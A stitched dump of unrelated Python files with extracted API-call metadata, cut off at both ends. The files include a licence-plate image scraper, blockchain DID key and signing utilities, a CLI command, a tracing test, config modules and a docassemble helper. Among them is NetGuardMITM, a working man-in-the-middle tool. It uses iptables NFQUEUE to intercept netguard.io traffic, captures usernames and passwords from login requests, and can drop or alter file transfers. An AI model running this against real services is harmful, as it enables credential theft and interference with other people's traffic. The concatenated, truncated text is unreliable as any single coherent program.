utils\n'), ((5418, 5512), 'stud.utils.extract_aspect_indices', 'utils.extract_aspect_indices', (['prediction_idxs', 'length', '*self.bio_itos'], {'return_tensors': '(True)'}), '(prediction_idxs, length, *self.bio_itos,\n return_tensors=True)\n', (5446, 5512), False, 'from stud import utils\n'), ((8589, 8694), 'stud.utils.extract_aspect_indices', 'utils.extract_aspect_indices', (['prediction_idxs', 'length', '*self.ner_model.bio_idxs'], {'return_tensors': '(True)'}), '(prediction_idxs, length, *self.ner_model.\n bio_idxs, return_tensors=True)\n', (8617, 8694), False, 'from stud import utils\n')] |
import argparse
import json
import os.path
import random
import re
import time
import cv2
import numpy as np
import requests
from PIL import Image
from config import config
class GermanLicensePlateImagesGenerator:
def __init__(self, output):
self.output = output
self.COUNTRY_MARKS = np.asarray([d['CM'] for d in json.loads(open(config.GERMAN_COUNTY_MARKS, encoding='utf-8').read())])
self.LETTERS = "ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÜ"
self.DIGITS = "0123456789"
self.COUNTRIES = ['BW', 'BY', 'BE', 'BB', 'HB', 'HH', 'HE', 'MV', 'NI', 'NW', 'RP', 'SL', 'SN', 'ST', 'SH', 'TH']
self.MONTHS = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']
self.YEARS = ['06', '07', '08', '09', '10', '11', '12', '13', '14', '15', '16', '17']
random.seed()
@staticmethod
def get_image_url(license_number, country, month, year):
license_number = license_number.replace("-", "%3A").replace("Ä", "%C4").replace("Ö", "%D6").replace("Ü", "%DC")
return "http://nummernschild.heisnbrg.net/fe/task?action=startTask&kennzeichen={0}&kennzeichenZeile2=&engschrift=false&pixelHoehe=32&breiteInMM=520&breiteInMMFest=true&sonder=FE&dd=01&mm=01&yy=00&kreis={1}&kreisName=&humm={2}&huyy={3}&sonderKreis=LEER&mm1=01&mm2=01&farbe=SCHWARZ&effekt=KEIN&tgaDownload=false".format(
license_number, country, month, year)
def __generate_license_number(self):
country = random.choice(self.COUNTRY_MARKS)
letter_count = random.randint(1, 2)
letters = "{}".format(random.choice(self.LETTERS)) if letter_count == 1 else "{}{}".format(
random.choice(self.LETTERS), random.choice(self.LETTERS))
min = 1 if letter_count == 2 else 1
digit_count = random.randint(min, max((8 - len(country) - letter_count), 4))
digits = ""
for i in range(digit_count):
digits += random.choice(self.DIGITS)
return "{}-{}{}".format(country, letters, digits)
def __create_license_plate_picture(self, n, license_number, country, front):
file_path = self.output + '/{0}#{1}.png'.format("F" if front else "R", license_number)
if os.path.exists(file_path):
return False
month = random.choice(self.MONTHS) if front else ''
year = random.choice(self.YEARS) if front else ''
create_image_url = GermanLicensePlateImagesGenerator.get_image_url(license_number, country, month, year)
r = requests.get(create_image_url)
if r.status_code != 200:
return False
id = re.compile('<id>(.*?)</id>', re.DOTALL | re.IGNORECASE).findall(
r.content.decode("utf-8"))[0]
status_url = 'http://nummernschild.heisnbrg.net/fe/task?action=status&id=%s' % id
time.sleep(.200)
r = requests.get(status_url)
if r.status_code != 200:
return False
show_image_url = 'http://nummernschild.heisnbrg.net/fe/task?action=showInPage&id=%s'
show_image_url = show_image_url % id
time.sleep(.200)
r = requests.get(show_image_url)
if r.status_code != 200:
return False
# sometimes the web service returns a corrupted image, check the image by getting the size and skip if corrupted
try:
numpyarray = np.fromstring(r.content, np.uint8)
image = cv2.imdecode(numpyarray, cv2.IMREAD_COLOR)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
im = Image.fromarray(image) # don't use cv2.imwrite() because there is a bug with utf-8 encoded filepaths
im.save(file_path)
print("{0:06d} : {1}".format(n, file_path))
return True
except:
return False
def generate(self, items):
for n in range(items):
while True:
license_number = self.__generate_license_number()
country = random.choice(self.COUNTRIES)
if not self.__create_license_plate_picture(n, license_number, country, True):
break
time.sleep(.200)
self.__create_license_plate_picture(n, license_number, country, False)
time.sleep(.200)
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--items", default="60000", help="Number of items to generate")
ap.add_argument("-o", "--output", default=config.PLATE_IMAGES, help="Output path")
args = vars(ap.parse_args())
lpdg = GermanLicensePlateImagesGenerator(os.path.abspath(args["output"]))
lpdg.generate(int(args["items"]))
| [
"PIL.Image.fromarray",
"random.choice",
"argparse.ArgumentParser",
"re.compile",
"requests.get",
"random.seed",
"time.sleep",
"cv2.imdecode",
"cv2.cvtColor",
"numpy.fromstring",
"random.randint"
] | [((4263, 4288), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4286, 4288), False, 'import argparse\n'), ((819, 832), 'random.seed', 'random.seed', ([], {}), '()\n', (830, 832), False, 'import random\n'), ((1470, 1503), 'random.choice', 'random.choice', (['self.COUNTRY_MARKS'], {}), '(self.COUNTRY_MARKS)\n', (1483, 1503), False, 'import random\n'), ((1528, 1548), 'random.randint', 'random.randint', (['(1)', '(2)'], {}), '(1, 2)\n', (1542, 1548), False, 'import random\n'), ((2499, 2529), 'requests.get', 'requests.get', (['create_image_url'], {}), '(create_image_url)\n', (2511, 2529), False, 'import requests\n'), ((2808, 2823), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (2818, 2823), False, 'import time\n'), ((2837, 2861), 'requests.get', 'requests.get', (['status_url'], {}), '(status_url)\n', (2849, 2861), False, 'import requests\n'), ((3067, 3082), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (3077, 3082), False, 'import time\n'), ((3096, 3124), 'requests.get', 'requests.get', (['show_image_url'], {}), '(show_image_url)\n', (3108, 3124), False, 'import requests\n'), ((1928, 1954), 'random.choice', 'random.choice', (['self.DIGITS'], {}), '(self.DIGITS)\n', (1941, 1954), False, 'import random\n'), ((2271, 2297), 'random.choice', 'random.choice', (['self.MONTHS'], {}), '(self.MONTHS)\n', (2284, 2297), False, 'import random\n'), ((2330, 2355), 'random.choice', 'random.choice', (['self.YEARS'], {}), '(self.YEARS)\n', (2343, 2355), False, 'import random\n'), ((3343, 3377), 'numpy.fromstring', 'np.fromstring', (['r.content', 'np.uint8'], {}), '(r.content, np.uint8)\n', (3356, 3377), True, 'import numpy as np\n'), ((3398, 3440), 'cv2.imdecode', 'cv2.imdecode', (['numpyarray', 'cv2.IMREAD_COLOR'], {}), '(numpyarray, cv2.IMREAD_COLOR)\n', (3410, 3440), False, 'import cv2\n'), ((3461, 3500), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (3473, 3500), False, 'import cv2\n'), ((3518, 3540), 'PIL.Image.fromarray', 'Image.fromarray', (['image'], {}), '(image)\n', (3533, 3540), False, 'from PIL import Image\n'), ((1579, 1606), 'random.choice', 'random.choice', (['self.LETTERS'], {}), '(self.LETTERS)\n', (1592, 1606), False, 'import random\n'), ((1661, 1688), 'random.choice', 'random.choice', (['self.LETTERS'], {}), '(self.LETTERS)\n', (1674, 1688), False, 'import random\n'), ((1690, 1717), 'random.choice', 'random.choice', (['self.LETTERS'], {}), '(self.LETTERS)\n', (1703, 1717), False, 'import random\n'), ((3952, 3981), 'random.choice', 'random.choice', (['self.COUNTRIES'], {}), '(self.COUNTRIES)\n', (3965, 3981), False, 'import random\n'), ((4119, 4134), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (4129, 4134), False, 'import time\n'), ((4239, 4254), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (4249, 4254), False, 'import time\n'), ((2602, 2657), 're.compile', 're.compile', (['"""<id>(.*?)</id>"""', '(re.DOTALL | re.IGNORECASE)'], {}), "('<id>(.*?)</id>', re.DOTALL | re.IGNORECASE)\n", (2612, 2657), False, 'import re\n')] |
# -*- coding:utf8 -*-
import os
from eth_account import Account
import sha3
import base64
import hashlib
from ecdsa import SigningKey, SECP256k1
DID_TYPE = ["weid"]
def create_privkey():
return os.urandom(32)
def create_ecdsa_privkey():
return SigningKey.generate(curve=SECP256k1)
def create_random_weid():
# 通过get的方式传送一个privkey data。
privkey = create_privkey()
account = generate_addr(priv=privkey.hex())
addr = account["payload"]["addr"]
# 拼接weid,这里CHAIN_ID是留给上链用的。
weid = "did:weid:CHAIN_ID:{addr}".format(addr=addr)
data = {
"privateKeyHex": account["payload"]["priv"],
"publicKeyHex": account["payload"]["pubv"],
"privateKeyInt": str(int(account["payload"]["priv"], 16)),
"publicKeyInt": str(int(account["payload"]["pubv"], 16)),
"weId": weid,
}
return data
def create_watting_weid(privkey):
# 通过get的方式传送一个privkey data。
account = generate_addr(priv=privkey)
addr = account["payload"]["addr"]
# 拼接weid,这里CHAIN_ID是留给上链用的。
weid = "did:weid:{addr}".format(addr=addr)
data = {
"privateKeyHex": account["payload"]["priv"],
"publicKeyHex": account["payload"]["pubv"],
"privateKeyInt": str(int(account["payload"]["priv"], 16)),
"publicKeyInt": str(int(account["payload"]["pubv"], 16)),
"weId": weid,
}
return data
def create_weid_by_privkey(privkey, chain_id):
if privkey[:2] == "0x":
account = generate_addr(priv=privkey[2:])
else:
account = generate_addr(priv=hex(int(privkey))[2:])
addr = account["payload"]["addr"]
# 拼接weid,这里CHAIN_ID是留给上链用的。
weid = "did:weid:{chain_id}:{addr}".format(chain_id=chain_id, addr=addr)
data = {
"privateKeyHex": account["payload"]["priv"],
"publicKeyHex": account["payload"]["pubv"],
"privateKeyInt": str(int(account["payload"]["priv"], 16)),
"publicKeyInt": str(int(account["payload"]["pubv"], 16)),
"weid": weid,
}
return data
def generate_addr(priv=None):
if priv == None:
account = Account.create()
else:
try:
account = Account.privateKeyToAccount(priv)
except Exception as e:
return {"result": "error", "error":e}
return {"result": "success",
"payload":
{"addr": account.address,
"priv": account.privateKey.hex(),
"pubv": str(account._key_obj.public_key).lower()
}}
def update_did_chain_id(did, chain_id):
split_did = did.split("CHAIN_ID")
split_did.append(split_did[1])
split_did[1] = chain_id
uplink_did = "".join(i for i in split_did)
return uplink_did
def verify_did(did):
verify_data = did.split(":")
if verify_data[0] != "did":
return "请提供正确的did。"
if verify_data[1] not in DID_TYPE:
return "请提供正确的DID Type。"
# if verify_data[2] == "CHAIN_ID":
# return "请指定正确的chain id。"
if verify_data[3][:2] != "0x":
return "请输入正确的did。"
return True
def Hash(msg):
k = sha3.keccak_256()
k.update(msg)
return k.hexdigest()
def ethtype_to_int_priv_pubv(priv, pubv):
"""
将 priv 和 pubv 转换为 weidentity 支持的格式(十进制)
:param priv: type: bytes
:param pubv: type: hex
:return: priv int, pubv int
"""
private_key = int.from_bytes(priv, byteorder='big', signed=False)
public_key = eval(pubv)
return {"priv": str(private_key), "pubv": str(public_key)}
def int_to_ethtype_priv_pubv(priv, pubv):
pass
def base64_decode(base_data):
"""
base64解密
:param base_data:
:return:
"""
bytes_data = base64.b64decode(base_data)
return bytes_data
def base64_encode(bytes_data):
"""
base64加密
:param bytes_data:
:return:
"""
base_data = base64.b64encode(bytes_data)
return bytes.decode(base_data)
def binary_to_list(bin):
list = []
for idx, val in enumerate(bin):
list.append(val)
return list
def list_to_binary(list):
bin = b''
for i in list:
bin += bytes([i])
return bin
def ecdsa_sign(encode_transaction, privkey):
if isinstance(privkey, str):
privkey = bytes.fromhex(privkey)
signning_key = SigningKey.from_string(privkey, curve=SECP256k1)
# encode_transaction = respBody['respBody']['encodedTransaction']
# base64解密
transaction = base64_decode(encode_transaction)
# 获取hash
hashedMsg = Hash(transaction)
bytes_hashed = bytes(bytearray.fromhex(hashedMsg))
# 签名
signature = signning_key.sign(bytes_hashed, hashfunc=hashlib.sha256)
# base64加密
transaction_encode = base64_encode(signature)
return transaction_encode | [
"eth_account.Account.create",
"os.urandom",
"base64.b64encode",
"ecdsa.SigningKey.generate",
"base64.b64decode",
"sha3.keccak_256",
"eth_account.Account.privateKeyToAccount",
"ecdsa.SigningKey.from_string"
] | [((199, 213), 'os.urandom', 'os.urandom', (['(32)'], {}), '(32)\n', (209, 213), False, 'import os\n'), ((254, 290), 'ecdsa.SigningKey.generate', 'SigningKey.generate', ([], {'curve': 'SECP256k1'}), '(curve=SECP256k1)\n', (273, 290), False, 'from ecdsa import SigningKey, SECP256k1\n'), ((3070, 3087), 'sha3.keccak_256', 'sha3.keccak_256', ([], {}), '()\n', (3085, 3087), False, 'import sha3\n'), ((3648, 3675), 'base64.b64decode', 'base64.b64decode', (['base_data'], {}), '(base_data)\n', (3664, 3675), False, 'import base64\n'), ((3811, 3839), 'base64.b64encode', 'base64.b64encode', (['bytes_data'], {}), '(bytes_data)\n', (3827, 3839), False, 'import base64\n'), ((4233, 4281), 'ecdsa.SigningKey.from_string', 'SigningKey.from_string', (['privkey'], {'curve': 'SECP256k1'}), '(privkey, curve=SECP256k1)\n', (4255, 4281), False, 'from ecdsa import SigningKey, SECP256k1\n'), ((2081, 2097), 'eth_account.Account.create', 'Account.create', ([], {}), '()\n', (2095, 2097), False, 'from eth_account import Account\n'), ((2143, 2176), 'eth_account.Account.privateKeyToAccount', 'Account.privateKeyToAccount', (['priv'], {}), '(priv)\n', (2170, 2176), False, 'from eth_account import Account\n')] |
import os
from .abstract_command import AbstractCommand
from ..services.state_utils import StateUtils
from ..services.state import StateHolder
from ..services.command_handler import CommandHandler
from ..services.console_logger import ColorPrint
class Start(AbstractCommand):
command = ["start", "up"]
args = ["[<project/plan>]"]
args_descriptions = {"[<project/plan>]": "Name of the project in the catalog and/or name of the project's plan"}
description = "Run: 'poco start nginx/default' or 'poco up nginx/default' to start nginx project (docker, helm " \
"or kubernetes) with the default plan."
run_command = "start"
need_checkout = True
def prepare_states(self):
StateUtils.calculate_name_and_work_dir()
StateUtils.prepare("compose_handler")
def resolve_dependencies(self):
if StateHolder.catalog_element is not None and not StateUtils.check_variable('repository'):
ColorPrint.exit_after_print_messages(message="Repository not found for: " + str(StateHolder.name))
self.check_poco_file()
def execute(self):
if self.need_checkout:
StateHolder.compose_handler.run_checkouts()
CommandHandler().run(self.run_command)
if hasattr(self, "end_message"):
ColorPrint.print_info(getattr(self, "end_message"))
@staticmethod
def check_poco_file():
if not StateUtils.check_variable('poco_file'):
poco_file = str(StateHolder.repository.target_dir if StateHolder.repository is not None
else os.getcwd()) + '/poco.yml'
ColorPrint.print_error(message="Poco file not found: " + poco_file)
ColorPrint.exit_after_print_messages(message="Use 'poco init " + StateHolder.name +
"', that will generate a default poco file for you",
msg_type="warn")
| [
"os.getcwd"
] | [((1590, 1601), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1599, 1601), False, 'import os\n')] |
from netfilterqueue import NetfilterQueue
import socket
from os import system
import scapy.all as scapy
import scapy_http.http
from urllib.parse import urlparse, parse_qs
REQUEST_LOGIN = 0
REQUEST_PROTECT = 1
class NetGuardMITM:
def __init__(self, ip, queue_number=1):
self.ip = ip
self.queue_number = queue_number
self.log_callback = None
self.netguard_server_ip = None
self.login_request_callback = None
self.protect_request_callback = None
self.login_response_callback = None
self.protect_response_callback = None
self.file_upload_packet_callback = None
self.file_download_packet_callback = None
self.file_transfer_in_progress = False
self.file_transfer_bytes_remaining = 0
self.__last_request = None
def log(self, message):
if self.log_callback:
self.log_callback(message)
def packet_callback(self, raw_packet):
"""
Main call back of sent and received packets.
:param raw_packet: The packet that is being sent/received.
"""
packet = scapy.IP(raw_packet.get_payload())
accept = True
if packet.haslayer("HTTP"):
tcp_layer = packet.getlayer("TCP")
http_layer = packet.getlayer("HTTP")
if packet.haslayer("Raw") and self.file_transfer_in_progress:
if packet.dst == self.netguard_server_ip:
accept = self.handle_file_upload_packet(raw_packet, packet)
elif packet.src == self.netguard_server_ip:
accept = self.handle_file_download_packet(raw_packet, packet)
else:
accept = True
if "HTTP Request" in http_layer:
accept = self.handle_request(raw_packet, packet)
elif "HTTP Response" in http_layer:
accept = self.handle_response(raw_packet, packet)
if accept:
raw_packet.accept()
else:
raw_packet.drop()
def handle_request(self, raw_packet, packet):
"""
Handles HTTP requests sent towards netguard.io. All other requests are ignored and therefore accepted.
:param raw_packet: The raw packet as obtained by NetfilterQueue
:param packet: The scapy representation of the HTTP packet.
:return True if the packet should be accepted, False otherwise.
"""
accept = True
http_layer = packet.getlayer("HTTP")
request = http_layer["HTTP Request"]
if request.Host != b"netguard.io":
return accept
# Record the (current) netguard.io IP.
self.netguard_server_ip = packet.dst
# Parse URL.
o = urlparse(request.Path)
arguments = parse_qs(o.query)
# Check which API call is being made and invoke corresponding callback.
if request.Method == b"GET":
if o.path == b"/API/login.php" and self.login_request_callback:
self.__last_request = REQUEST_LOGIN
accept = self.login_request_callback(raw_packet, packet, arguments[b"username"], arguments[b"password"])
elif request.Method == b"POST":
if o.path == b"/API/protect.php":
if self.protect_request_callback:
accept = self.protect_request_callback(raw_packet, packet, arguments[b"username"], arguments[b"password"])
self.__last_request = REQUEST_PROTECT
self.file_transfer_in_progress = True
self.file_transfer_bytes_remaining = int(request.fields["Content-Length"])
return accept
def handle_response(self, raw_packet, packet):
"""
Handles a single HTTP response from netguard.io. All other responses are ignored and therefore accepted.
:param raw_packet: The raw packet as obtained by NetfilterQueue.
:param packet: The scapy representation of the HTTP packet.
:return: True if the packet should be accepted, False otherwise.
"""
accept = True
if packet.src != self.netguard_server_ip:
return accept
http_layer = packet.getlayer("HTTP")
response = http_layer["HTTP Response"]
body = packet.getlayer("Raw")
# NOTE: We assume that the response comes directly after the request.
# This might not be accurate, as packets can be reordered during the transmission.
# For more reliable results, check sequence numbers of packets.
# Check what kind of response we're dealing with.
if self.__last_request == REQUEST_LOGIN and self.login_response_callback:
accept = self.login_response_callback(raw_packet, packet, body)
self.__last_request = None
elif self.__last_request == REQUEST_PROTECT:
if self.protect_response_callback:
accept = self.protect_response_callback(raw_packet, packet, body)
if "Content-Length" in response.fields:
self.file_transfer_in_progress = True
self.file_transfer_bytes_remaining = int(response.fields["Content-Length"])
self.handle_file_download_packet(raw_packet, packet)
self.__last_request = None
return accept
def handle_file_upload_packet(self, raw_packet, packet):
"""
Handles a single HTTP packet containing (a chunk of) the file to be uploaded to netguard.io.
:param raw_packet: The raw packet as obtained by NetfilterQueue.
:param packet: The scapy representation of the HTTP packet.
:return: True if the packet should be accepted, False otherwise.
"""
accept = True
raw_layer = packet.getlayer("Raw")
self.file_transfer_bytes_remaining -= len(raw_layer.load)
if self.file_upload_packet_callback:
accept = self.file_upload_packet_callback(raw_packet, packet, raw_layer.load, self.file_transfer_bytes_remaining)
self.file_transfer_in_progress = self.file_transfer_bytes_remaining > 0
return accept
def handle_file_download_packet(self, raw_packet, packet):
"""
Handles a single HTTP packet containing (a chunk of) the protected file that is being downloaded from
the netguard.io server.
:param raw_packet: The raw packet as obtained by NetfilterQueue.
:param packet: THe scapy representation of the HTTP packet.
:return: True if the packet should be accepted, False otherwise.
"""
accept = True
raw_layer = packet.getlayer("Raw")
self.file_transfer_bytes_remaining -= len(raw_layer.load)
if self.file_download_packet_callback:
accept = self.file_download_packet_callback(raw_packet, packet, raw_layer.load, self.file_transfer_bytes_remaining)
self.file_transfer_in_progress = self.file_transfer_bytes_remaining > 0
return accept
def do_mitm(self):
"""
Performs the man-in-the-middle attack. This function is blocking.
"""
try:
# Add necessary IP table entries.
self.log("Updating IP tables...")
system("iptables -A INPUT -d {} -p tcp -j NFQUEUE --queue-num {}".format(self.ip, self.queue_number))
system("iptables -A OUTPUT -s {} -p tcp -j NFQUEUE --queue-num {}".format(self.ip, self.queue_number))
# Bind to filter queue.
nfqueue = NetfilterQueue()
nfqueue.bind(self.queue_number, self.packet_callback)
s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM)
try:
self.log("Running MITM...")
nfqueue.run_socket(s)
except KeyboardInterrupt:
pass
self.log("Closing sockets...")
s.close()
nfqueue.unbind()
finally:
# Remove IP table entries.
self.log("Restoring IP tables.")
system("iptables -D INPUT 1")
system("iptables -D OUTPUT 1")
| [
"urllib.parse.parse_qs",
"os.system",
"urllib.parse.urlparse",
"netfilterqueue.NetfilterQueue"
] | [((2749, 2771), 'urllib.parse.urlparse', 'urlparse', (['request.Path'], {}), '(request.Path)\n', (2757, 2771), False, 'from urllib.parse import urlparse, parse_qs\n'), ((2792, 2809), 'urllib.parse.parse_qs', 'parse_qs', (['o.query'], {}), '(o.query)\n', (2800, 2809), False, 'from urllib.parse import urlparse, parse_qs\n'), ((7486, 7502), 'netfilterqueue.NetfilterQueue', 'NetfilterQueue', ([], {}), '()\n', (7500, 7502), False, 'from netfilterqueue import NetfilterQueue\n'), ((8025, 8054), 'os.system', 'system', (['"""iptables -D INPUT 1"""'], {}), "('iptables -D INPUT 1')\n", (8031, 8054), False, 'from os import system\n'), ((8067, 8097), 'os.system', 'system', (['"""iptables -D OUTPUT 1"""'], {}), "('iptables -D OUTPUT 1')\n", (8073, 8097), False, 'from os import system\n')] |
"""Config options for WDRAX.
Gets settings from environment variables or .env/settings.ini file.
"""
import pathlib
from decouple import AutoConfig
BASE_DIR = pathlib.Path(__name__).absolute().parent
config = AutoConfig(search_path=str(BASE_DIR)) # pylint: disable=invalid-name
LOG_LEVEL = config('LOG_LEVEL', default='INFO')
PLUGIN_DIR = config('PLUGIN_DIR',
cast=pathlib.Path,
default=BASE_DIR.joinpath('plugins'))
#: Directory into which output zip files should be placed
OUTPUT_DIR = config('OUTPUT_DIR',
cast=pathlib.Path,
default=BASE_DIR.joinpath('media'))
REDIS_HOST = config('REDIS_HOST', default=None)
REDIS_PORT = config('REDIS_PORT', cast=int, default=6379)
REDIS_DB = config('REDIS_DB', default='0')
CELERY_BROKER_URL = config(
'CELERY_BROKER_URL',
default=(None if REDIS_HOST is None else
f'redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_DB}'))
CELERY_RESULT_BACKEND = config(
'CELERY_RESULT_BACKEND',
default=CELERY_BROKER_URL
)
SQLALCHEMY_DATABASE_URI = config(
'SQLALCHEMY_DATABASE_URI',
default=f'sqlite:///{BASE_DIR.joinpath("db.sqlite3")}')
TWEET_PROVIDERS = [
'wdra_extender.extract.tweet_providers.redis_provider',
'wdra_extender.extract.tweet_providers.twarc_provider',
]
TWITTER_CONSUMER_KEY = config('TWITTER_CONSUMER_KEY', default=None)
TWITTER_CONSUMER_SECRET = config('TWITTER_CONSUMER_SECRET', default=None)
TWITTER_ACCESS_TOKEN = config('TWITTER_ACCESS_TOKEN', default=None)
TWITTER_ACCESS_TOKEN_SECRET = config('TWITTER_ACCESS_TOKEN_SECRET', default=None)
SQLALCHEMY_TRACK_MODIFICATIONS = False
| [
"pathlib.Path"
] | [((163, 185), 'pathlib.Path', 'pathlib.Path', (['__name__'], {}), '(__name__)\n', (175, 185), False, 'import pathlib\n')] |
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import random
import shutil
import sys
import tempfile
import pytest
from elasticapm.contrib.zerorpc import Middleware
zerorpc = pytest.importorskip("zerorpc")
gevent = pytest.importorskip("gevent")
has_unsupported_pypy = hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 6)
@pytest.mark.skipif(has_unsupported_pypy, reason="Failure with pypy < 2.6")
def test_zerorpc_middleware_with_reqrep(elasticapm_client):
tmpdir = tempfile.mkdtemp()
server_endpoint = "ipc://{0}".format(os.path.join(tmpdir, "random_zeroserver"))
try:
zerorpc.Context.get_instance().register_middleware(Middleware(client=elasticapm_client))
server = zerorpc.Server(random)
server.bind(server_endpoint)
gevent.spawn(server.run)
client = zerorpc.Client()
client.connect(server_endpoint)
with pytest.raises(zerorpc.exceptions.RemoteError) as excinfo:
client.choice([])
client.close()
server.close()
finally:
shutil.rmtree(tmpdir, ignore_errors=True)
ex = excinfo.value
assert ex.name == "IndexError"
assert len(elasticapm_client.events) == 1
exc = elasticapm_client.events[0]["errors"][0]["exception"]
assert exc["type"] == "IndexError"
frames = exc["stacktrace"]
assert frames[0]["function"] == "choice"
assert frames[0]["module"] == "random"
assert elasticapm_client.events[0]["errors"][0]["exception"]["handled"] is False
| [
"elasticapm.contrib.zerorpc.Middleware",
"os.path.join",
"pytest.mark.skipif",
"pytest.importorskip",
"tempfile.mkdtemp",
"pytest.raises",
"shutil.rmtree"
] | [((1734, 1764), 'pytest.importorskip', 'pytest.importorskip', (['"""zerorpc"""'], {}), "('zerorpc')\n", (1753, 1764), False, 'import pytest\n'), ((1774, 1803), 'pytest.importorskip', 'pytest.importorskip', (['"""gevent"""'], {}), "('gevent')\n", (1793, 1803), False, 'import pytest\n'), ((1901, 1975), 'pytest.mark.skipif', 'pytest.mark.skipif', (['has_unsupported_pypy'], {'reason': '"""Failure with pypy < 2.6"""'}), "(has_unsupported_pypy, reason='Failure with pypy < 2.6')\n", (1919, 1975), False, 'import pytest\n'), ((2049, 2067), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (2065, 2067), False, 'import tempfile\n'), ((2109, 2150), 'os.path.join', 'os.path.join', (['tmpdir', '"""random_zeroserver"""'], {}), "(tmpdir, 'random_zeroserver')\n", (2121, 2150), False, 'import os\n'), ((2613, 2654), 'shutil.rmtree', 'shutil.rmtree', (['tmpdir'], {'ignore_errors': '(True)'}), '(tmpdir, ignore_errors=True)\n', (2626, 2654), False, 'import shutil\n'), ((2220, 2256), 'elasticapm.contrib.zerorpc.Middleware', 'Middleware', ([], {'client': 'elasticapm_client'}), '(client=elasticapm_client)\n', (2230, 2256), False, 'from elasticapm.contrib.zerorpc import Middleware\n'), ((2457, 2502), 'pytest.raises', 'pytest.raises', (['zerorpc.exceptions.RemoteError'], {}), '(zerorpc.exceptions.RemoteError)\n', (2470, 2502), False, 'import pytest\n')] |
from bs4 import BeautifulSoup as Soup
import re
import json
import sys
import shutil
import tempfile
import os
import subprocess
from pathlib import Path
from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore
__all__ = ['run_automation', 'noquote', 'number_with_max', 'retirement_index_increment', 'ParentDict', 'ChildrenList']
class ParentDict(DADict):
def init(self, *pargs, **kwargs):
super().init(*pargs, **kwargs)
self.object_type = Individual
self.auto_gather = False
class ChildrenList(DAList):
def init(self, *pargs, **kwargs):
super().init(*pargs, **kwargs)
self.object_type = Individual
self.ask_number = True
def hook_on_gather(self):
if 'C' in value('child_support_group') and not any(child.lives_with_non_parent_custodian for child in self.elements):
force_ask('no_child_with_guardian')
def hook_after_gather(self):
self.sort(key=lambda y: y.birthdate, reverse=True)
def retirement_index_increment(parent):
if parent.tax_method == 'estimated':
for income_source in parent.income_sources:
if income_source.type == 'Employer Wages' and income_source.must_contribute_to_retirement and income_source.mandatory_percentage > 0:
return 1
return 0
def number_with_max(number, maximum):
if number >= maximum:
return str(maximum) + '+'
return str(number)
def noquote(text):
if re.search(r'[^A-Za-z\' 0-9\_\-\n\r]', text):
raise validation_error("You are only allowed to type characters A-Z, a-z, 0-9, and -.")
return True
def run_automation(feature_file, html_file, png_file, json_file, base_name):
base_name = space_to_underscore(base_name)
try:
with tempfile.TemporaryDirectory(prefix='datemp') as temp_directory:
output_file = os.path.join(temp_directory, 'output.html')
output_png = os.path.join(temp_directory, 'output.png')
features_directory = shutil.copytree(path_and_mimetype('data/sources/features')[0], os.path.join(temp_directory, 'features'))
shutil.copyfile(feature_file, os.path.join(features_directory, 'calculate.feature'))
Path(os.path.join(features_directory, '__init__.py')).touch()
Path(os.path.join(features_directory, 'steps', '__init__.py')).touch()
output = ''
with open(feature_file, encoding='utf-8') as x:
output += x.read()
try:
commands = ["aloe", "--stop", "--verbosity=3", "features/calculate.feature"]
output += "\n\n" + ' '.join(commands) + "\n"
#output += subprocess.check_output(["ls", "-lR"], cwd=temp_directory, stderr=subprocess.STDOUT).decode()
output += subprocess.check_output(commands, cwd=temp_directory, stderr=subprocess.STDOUT).decode()
success = True
except subprocess.CalledProcessError as err:
output += err.output.decode()
success = False
if success:
if os.path.isfile(output_file):
html_file.initialize(filename=base_name + '.html')
html_file.copy_into(output_file)
html_file.commit()
else:
success = False
output += "\nFile not found after process completed.\n"
if os.path.isfile(output_png):
png_file.initialize(filename=base_name + '.png')
png_file.copy_into(output_png)
png_file.commit()
# else:
# success = False
# output += "\nPNG file not found after process completed.\n"
except Exception as err:
success = False
output = err.__class__.__name__ + ": " + str(err)
if success:
try:
